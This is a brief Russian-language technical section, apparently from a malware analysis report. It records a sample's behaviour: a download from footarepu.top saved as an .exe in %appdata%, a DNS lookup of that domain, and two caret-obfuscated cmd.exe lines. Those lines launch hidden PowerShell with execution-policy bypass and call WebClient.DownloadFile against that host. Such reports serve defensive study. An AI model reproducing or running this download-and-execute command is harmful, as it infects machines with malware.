Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oweRShEl^l.^Ex^e^ ^-e^xe^CuTio^nP^OLIcy^ B^Y^P^aSs^ -^N^OPR^o^fil^e -WI^NDO^wStY^L^e^ h^I^dDE^N (ne^w-^O^bjEC^t ^SYste^m.NeT.w^eb^Cli^eNT).^doW^N^LOAd^F^iL^e(^'http://footarepu...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "P^oweRShEl^l.^Ex^e^ ^-e^xe^CuTio^nP^OLIcy^ B^Y^P^aSs^ -^N^OPR^o^fil^e -WI^NDO^wStY^L^e^ h^I^dDE^N (ne^w-^O^bjEC^t ^SYste^m.NeT.w^eb^Cli^eNT).^doW^N^LOAd^F^iL^e(^'http://footarepu...' (со скрытым окном)